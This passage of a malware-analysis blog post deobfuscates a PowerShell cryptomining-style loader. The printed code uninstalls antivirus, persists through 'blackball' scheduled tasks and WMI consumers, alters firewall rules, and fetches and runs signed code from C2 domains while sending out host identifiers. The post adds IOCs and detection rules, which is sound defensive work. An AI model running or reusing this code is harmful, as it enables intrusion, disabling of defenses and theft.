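        "$ShellId[1]+$ShellId[13]+'X'": indexed_chars(SHELL_ID, [1, 13]) + "X",
        "$VerbosePreference.ToString()[1,3]+'X'": indexed_chars(VERBOSE_PREFERENCE, [1, 3]) + "X",
    }

# Lines copied from the Stage 2 and Stage 1 blobs above.
STAGE2_LINE = ("schta'+'sksqfh+qf'+'h /qfh+qfhcreate /ru system'+' /sc MINUTE /mo 12'+'0 "
               "/tn blackball /F /tr qfh+qfhpgOblackballpgO")
STAGE1_LINE = "OgpllabkcalbOgp'+' rt/ F/ llabkcalb nt/ 021 om'+'/ ETUNIM cs/ etaerc/ sksathcs"
STAGE2_TASK = "Kv1doit=Kv1stsrv.GetFolder(pgOxJypgO).GetTask(pgOblackballpgO)"

if __name__ == "__main__":
    print(clean_stage2(STAGE2_LINE))
    print(clean_stage1(STAGE1_LINE))
    for expr, value in resolve_iex_aliases().items():
        print(f"{expr} -> {value}")
```

Removing the `'+'` glue before restoring the quotes matters: the blob splits even the qfh token itself (`qf'+'h`), so the join has to be undone first and then once more after qfh becomes a quote. For detection, the three alias expressions are worth remembering: none of them contains the string "iex", which is exactly why the author of the script used them.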

Stage 3

The cleaned code we end up with is ⬇️ this; I added a few comments as well.


# This block is checking for various AntiVirus products like Eset, Kaspersky, avast, avp, Norton etc and uninstalling them.
#-------------------------------------------block1--------------------------------------
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
#-------------------------------------------block1#-------------------------------------------

$v="?"+(Get-Date -Format '_yyyyMMdd')

# A Powershell command that will be used later, 
$tmps='function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String("2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=");$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url="http://"U1"U2"/a.jsp"+$v+"?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*");a($url)'

# Checks if the current PowerShell has Administrator privileges
$sa=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")

# Generates a Random String
function getRan(){
	return -join([char[]](48..57+65..90+97..122)| Get-Random -Count (6+(Get-Random)%6))
}

# Array containing Domains, maybe C&C(Command and Control) server domains. 
$us=@('t[.]zz3r0[.]com','t[.]zker9.com','t[.]bb3u9.com')

# Creates Schedule Service object, Which could be used to view Scheduled tasks
$stsrv = New-Object -ComObject Schedule.Service
$stsrv.Connect()

# Checks if a task with name "blackball" is scheduled or not
try{
	$doit=$stsrv.GetFolder("\").GetTask("blackball")
}
catch{}

# If "blackball" is not scheduled
if(-not $doit){
    
    # If running with administrator privileges, schedule the task to run as the SYSTEM user
	if($sa){
	    schtasks /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	}
    # otherwise schedule it as normal user
	else {
		schtasks /create /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	}
    
    # for each domain the array of domains,
	foreach($u in $us){

		$i = [array]::IndexOf($us,$u)
		
        # Generate Random task name
		if($i%3 -eq 0){$tnf=''}
		if($i%3 -eq 1){$tnf=getRan}
		if($i%3 -eq 2){
			if($sa){
				$tnf='MicroSoft\Windows\'+(getRan)
			}
			else{
				$tnf=getRan
			}
		}
		$tn = getRan

        # If administrator privileges, then schedule a task to run the PS_CMD powershell script as the SYSTEM user
		if($sa){
			schtasks /create /ru system /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -c PS_CMD"
		} 
        # Otherwise Schedule task as normal user
		else {
			schtasks /create /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
		}
        # Sleeps for 1 second
		start-sleep 1
		
        # Gets the tasks in the folder created earlier into an array.
		$folder=$stsrv.GetFolder("\$tnf")
		$taskitem=$folder.GetTasks(1)
		
        # For each task that was created, replace the PS_CMD placeholder with the tmps variable set earlier, replacing U1 and U2 with the domains declared earlier
		foreach($task in $taskitem){
			foreach ($action in $task.Definition.Actions) {
				try{
					if($action.Arguments.Contains("PS_CMD")){
						$folder.RegisterTask($task.Name, $task.Xml.replace("PS_CMD",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5))), 4, $null, $null, 0, $null)|out-null
					}
				}catch{}
			}
		} 
        # Sleeps for 1 second		
		start-sleep 1
		
		schtasks /run /tn "$tnf\$tn" 
        
        # Sleeps for 5 seconds
		start-sleep 5
	}
}

# Checks if an event with blackball exists or not
try{
	$doit1=Get-WMIObject -Class __EventFilter -NameSpace 'root\subscription' -filter "Name='blackball'"
}
catch{}

# If the blackball event filter does not exist, then create it
if(-not $doit1){
	Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="blackball";EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop
	
    # and add a consumer that runs the powershell script tmps declared earlier
	foreach($u in $us){
		$theName=getRan
		$wmicmd=$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5)).replace('a.jsp','aa.jsp')
		
		Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=(Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="f"+$theName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop);Consumer=(Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name="c"+$theName;ExecutablePath="c:\windows\system32\cmd.exe";CommandLineTemplate="/c powershell -c $wmicmd"})}

		start-sleep 5
	}
	
	Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
}
# This block adds some firewall rules
#----------------------------------------Block2----------------------------------------
cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
#----------------------------------------Block2----------------------------------------

# This block deletes scheduled tasks with name Rtsa, Rtsa1, Rtsa2
#----------------------------------------Block3----------------------------------------
schtasks /delete /tn Rtsa2 /F
schtasks /delete /tn Rtsa1 /F
schtasks /delete /tn Rtsa /F
#----------------------------------------Block3----------------------------------------

Let’s understand what this code does:

  • The first block checks for the presence of various antivirus products (Eset, Kaspersky, Avast, AVP, Norton, etc.) and uninstalls them.
  • Then a variable tmps is initialized with some PowerShell code.
  • Then it checks whether PowerShell is running with administrator privileges.
  • There is a getRan function which generates a random string.
  • An array with some domains is initialized; these are possibly C&C servers used to deliver more payloads.
  • Then it checks whether a task named “blackball” is present.
  • If the task is not present, it creates a scheduled task with SYSTEM privileges (if PowerShell is running with administrator privileges) or otherwise with user privileges.
  • The task scheduled earlier runs the PowerShell script stored in the tmps variable; this script is our next stage of payload.
  • Then the code checks whether a WMI event filter named “blackball” is present.
  • If the event filter isn’t present, it creates one, bound to a consumer that runs the same tmps PowerShell script.
  • Then there is block 2, which adds firewall rules: it opens TCP port 65529 and proxies it to 1.1.1.1:53, and blocks inbound TCP 445 and 135.
  • Lastly there is block 3, which deletes the scheduled tasks named Rtsa, Rtsa1 and Rtsa2.

Let’s move to the PowerShell script in the tmps variable, which is our next stage.

Stage 4

function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String("2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=");$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url="http://"U1"U2"/a.jsp"+$v+"?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*");a($url)

Let’s clean up and format this code:

function a($u){
	$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());
	
	$c=$d.count;
	
	if($c -gt 173){

		$b=$d[173..$c];

		$p=New-Object Security.Cryptography.RSAParameters;

        $p.Modulus=[convert]::FromBase64String("2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=");
		$p.Exponent=0x01,0x00,0x01;
		
		$r=New-Object Security.Cryptography.RSACryptoServiceProvider;
        $r.ImportParameters($p);
		
		if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){
			Iex(-join[char[]]$b)
		}
	}
}

$url="hxxp[://]t[.]zz3r0[.]com/a.jsp?__preex_20210425?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*");

a($url)

Let’s try to understand what this code does:

  • We have a function named “a” which takes a parameter “u”.
  • This function downloads a file from the URL passed in the parameter u.
  • It checks whether the downloaded data is longer than 173 bytes; if so, a variable b is initialized with the data from that offset onward, i.e. data[173:].
  • Then it creates an RSAParameters object and sets its Modulus and Exponent, which are used later.
  • Then it creates an RSACryptoServiceProvider object (which can encrypt, decrypt and verify data) and imports the RSAParameters object created earlier into it.
  • This RSACryptoServiceProvider object is then used to verify the digital signature of the downloaded data, and if verification succeeds, the data is run as PowerShell through Invoke-Expression (IEX).
  • Lastly the function “a” is called with the parameter “u” set to "hxxp://t[.]zz3r0[.]com/a[.]jsp?__preex_20210425?"+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join"*").

Running this script downloads and invokes the script in the file “a.jsp”. The downloaded “a.jsp” is:

lAgx9ARFV4laNRcwsoiT6Vg4tC/IoQR3WUbV38N0bcG+Jmj1EhfbYHneyTJPX5bDKSfycOWTQ+a6v39cIsB6ZEq+Uc9iDygwPFOBUDw6EUltgevVIK3VeZ8yFQPozvS00D/95rVZymbEDD7eeU1+mDr4Ku6AyxyQhIo0G1ucUnM=
IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('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'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Here the first line contains the Base64 string lAgx9ARFV4laNRcwsoiT6Vg4tC/IoQR3WUbV38N0bcG+Jmj1EhfbYHneyTJPX5bDKSfycOWTQ+a6v39cIsB6ZEq+Uc9iDygwPFOBUDw6EUltgevVIK3VeZ8yFQPozvS00D/95rVZymbEDD7eeU1+mDr4Ku6AyxyQhIo0G1ucUnM= (172 characters, exactly the $d[0..171] slice the function reads as the RSA signature), and after the newline follows the code that is invoked once the signature verifies.
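Added example, not part of the post or of the malware: the verification step from the cleaned script reimplemented in Python so the layout of a.jsp can be checked offline. It splits the file the way $d[0..171] and $d[173..$c] do, then performs the same RSA PKCS#1 v1.5 / SHA-1 check that VerifyData performs, using the modulus from the script. Only the signature line of the real a.jsp is reproduced on this page, so a placeholder stands in for its body and verification of that sample is expected to fail; a toy key built from two Mersenne primes (not a secure key) is included so the positive path can be exercised. Function names are mine.

```python
import base64
import binascii
import hashlib

# RSA public modulus embedded in the Stage 4 script (Base64, copied from the page).
LEMONDUCK_MODULUS_B64 = "2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10="
LEMONDUCK_N = int.from_bytes(base64.b64decode(LEMONDUCK_MODULUS_B64), "big")
LEMONDUCK_E = 0x010001  # $p.Exponent = 0x01,0x00,0x01

# DigestInfo prefix for SHA-1 in EMSA-PKCS1-v1_5 (RFC 8017 section 9.2), the
# padding RSACryptoServiceProvider.VerifyData applies when given SHA1.
SHA1_DIGEST_INFO = bytes.fromhex("3021300906052b0e03021a05000414")
SIG_CHARS = 172  # the script reads $d[0..171] as the Base64 signature

def split_payload(data: bytes, sig_chars: int = SIG_CHARS):
    """Mirror the script's slicing: Base64 signature, one newline, then the body."""
    if len(data) <= sig_chars + 1:                  # the $c -gt 173 check
        raise ValueError("payload too short to carry a signature")
    signature = base64.b64decode(data[:sig_chars])  # FromBase64String($d[0..171])
    body = data[sig_chars + 1:]                     # $d[173..$c]
    return signature, body

def pkcs1_v15_encode(body: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5 encoding of SHA-1(body) for a k-byte modulus."""
    t = SHA1_DIGEST_INFO + hashlib.sha1(body).digest()
    if k < len(t) + 11:
        raise ValueError("modulus too small for PKCS#1 v1.5")
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def verify(body: bytes, signature: bytes, n: int, e: int) -> bool:
    """Pure-Python equivalent of $r.VerifyData($b, SHA1, $signature)."""
    k = (n.bit_length() + 7) // 8
    if len(signature) != k:
        return False
    s = int.from_bytes(signature, "big")
    if s >= n:
        return False
    em = pow(s, e, n).to_bytes(k, "big")
    return em == pkcs1_v15_encode(body, k)

def is_signed(data: bytes, n: int = LEMONDUCK_N, e: int = LEMONDUCK_E,
              sig_chars: int = SIG_CHARS) -> bool:
    """True only if the body was signed by the private half of (n, e)."""
    try:
        signature, body = split_payload(data, sig_chars)
    except (ValueError, binascii.Error):
        return False
    return verify(body, signature, n, e)

# Toy key for the self-test only: Mersenne primes 2^127-1 and 2^521-1. Not a
# secure key, merely large enough for the PKCS#1 encoding to fit.
def toy_keypair():
    p, q = (1 << 127) - 1, (1 << 521) - 1
    n, e = p * q, 65537
    d = pow(e, -1, (p - 1) * (q - 1))
    return n, e, d

def toy_sign(body: bytes, n: int, d: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    em = int.from_bytes(pkcs1_v15_encode(body, k), "big")
    return pow(em, d, n).to_bytes(k, "big")

def build_signed_file(body: bytes, n: int, d: int) -> bytes:
    """Lay out a body in the same shape as a.jsp: Base64 signature, newline, body."""
    return base64.b64encode(toy_sign(body, n, d)) + b"\n" + body

# The a.jsp sample from the page; its second line is not reproduced there, so a
# placeholder stands in for the body and is expected to fail verification.
AJSP_SAMPLE = (
    b"lAgx9ARFV4laNRcwsoiT6Vg4tC/IoQR3WUbV38N0bcG+Jmj1EhfbYHneyTJPX5bDKSfycOWTQ+a6v39cIsB6ZEq+Uc9iDygwPFOBUDw6EUltgevVIK3VeZ8yFQPozvS00D/95rVZymbEDD7eeU1+mDr4Ku6AyxyQhIo0G1ucUnM=\n"
    b"<body of a.jsp omitted on this page>"
)

if __name__ == "__main__":
    sig, body = split_payload(AJSP_SAMPLE)
    print(len(sig), "byte signature; verifies with the LemonDuck key:", is_signed(AJSP_SAMPLE))
    n, e, d = toy_keypair()
    sample = build_signed_file(b"Write-Output 'constructed body'", n, d)
    print("toy-signed sample verifies:", is_signed(sample, n, e, sample.index(b"\n")))
```

Two things follow from this check. The 1024-bit modulus is a stable artefact of the sample: a defender can pin it as an indicator, since every payload the scheduled tasks and WMI consumers fetch must verify against it. And because verification precedes IEX, swapping the body of a captured a.jsp for analysis purposes makes the loader silently do nothing rather than run the substitute, which is the behaviour the placeholder sample above exercises.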

We will analyze the script “a.jsp” in the next article.

IOC

IOCs (Indicators of Compromise) are pieces of data, such as entries found in logs or files, that identify potentially malicious activity on a system or network. They help identify the systems that might be affected by the malware: for example, if the malware communicates with an external IP address, then any system that contacted that IP address is considered to be infected.

So in this malware the potential IOCs are:

  • Any HTTP requests made to “hxxp[://]t[.]zz3r0[.]com”, “hxxp[://]t[.]zker9[.]com” or “hxxp[://]t[.]bb3u9[.]com” (URLs are defanged to prevent accidental clicks)
  • Presence of a scheduled task named blackball, or of tasks with random names of the kind generated by getRan
  • Presence of an open port such as TCP 65529 (port-proxied to 1.1.1.1:53)
  • Presence of a WMI event filter named blackball
  • Antivirus products uninstalled without any user interaction
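Added example, not from the post: the IOCs listed above turned into simple detection rules that can be run over process-creation, DNS and WMI log lines, one rule per behaviour described in the Stage 3 walkthrough. The log lines are constructed for the example (loosely Sysmon/DNS-log shaped), not real telemetry; the indicators are kept defanged as listed and refanged only for matching. Rule and function names are mine.

```python
import re

# Indicators from the analysis above, kept defanged exactly as the post lists them.
IOC_DOMAINS = ["t[.]zz3r0[.]com", "t[.]zker9[.]com", "t[.]bb3u9[.]com"]

def refang(indicator: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    return indicator.replace("[.]", ".")

# One rule per behaviour the post describes; each maps to a compiled pattern.
RULES = {
    "c2_domain": re.compile("|".join(re.escape(refang(d)) for d in IOC_DOMAINS), re.I),
    "blackball_task": re.compile(r'schtasks(?:\.exe)?\s+/create\b.*?/tn\s+"?blackball\b', re.I),
    "portproxy_65529": re.compile(r"portproxy\s+add\s+v4tov4\s+listenport=65529\b", re.I),
    "firewall_65529": re.compile(r"firewall\s+add\s+portopening\s+tcp\s+65529\b", re.I),
    "wmi_eventfilter_blackball": re.compile(r"__EventFilter\b.*?Name=\W*blackball\b", re.I),
    "av_uninstall_via_wmic": re.compile(r"wmic(?:\.exe)?\s+product\s+where\b.*?\bcall\s+uninstall\b", re.I),
}

def scan(lines):
    """Return (rule, line) pairs for every line that matches an IOC rule."""
    hits = []
    for line in lines:
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((name, line))
    return hits

def summarize(lines):
    """Count hits per rule, omitting rules that never fired."""
    counts = {}
    for name, _ in scan(lines):
        counts[name] = counts.get(name, 0) + 1
    return counts

# Constructed log lines (not real telemetry); the last one is benign noise.
SAMPLE_LOG = [
    "2021-04-25 10:01:02 DNS query host=WS01 qname=t.zz3r0.com type=A",
    "2021-04-25 10:01:05 ProcessCreate host=WS01 image=C:\\Windows\\System32\\schtasks.exe "
    'cmdline="schtasks /create /sc MINUTE /mo 120 /tn blackball /F /tr \\"blackball\\""',
    "2021-04-25 10:01:07 ProcessCreate host=WS01 image=C:\\Windows\\System32\\netsh.exe "
    'cmdline="netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53"',
    "2021-04-25 10:01:09 WmiEvent host=WS01 type=WmiFilter operation=Created "
    "filter=__EventFilter Name='blackball' Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 3600\"",
    "2021-04-25 10:01:11 ProcessCreate host=WS01 image=C:\\Windows\\System32\\wbem\\WMIC.exe "
    'cmdline="wmic.exe product where \\"name like \'%avast%\'\\" call uninstall /nointeractive"',
    "2021-04-25 10:02:00 ProcessCreate host=WS01 image=C:\\Windows\\System32\\schtasks.exe "
    'cmdline="schtasks /query /tn \\"Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan\\""',
]

if __name__ == "__main__":
    for rule, line in scan(SAMPLE_LOG):
        print(f"[{rule}] {line}")
    print(summarize(SAMPLE_LOG))
```

The domain rule is the weakest of the set, since the operators can rotate domains; the task name, the WMI filter name, the portproxy on 65529 and the wmic-driven uninstall pattern are behaviours of this sample and survive a change of infrastructure, so they are the better candidates for a persistent hunt.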

You can get the scripts I extracted and the IOCs we determined from this GitHub repository.


Thanks for Reading, Stay tuned for more ❤︎


This post is licensed under CC BY 4.0 by the author.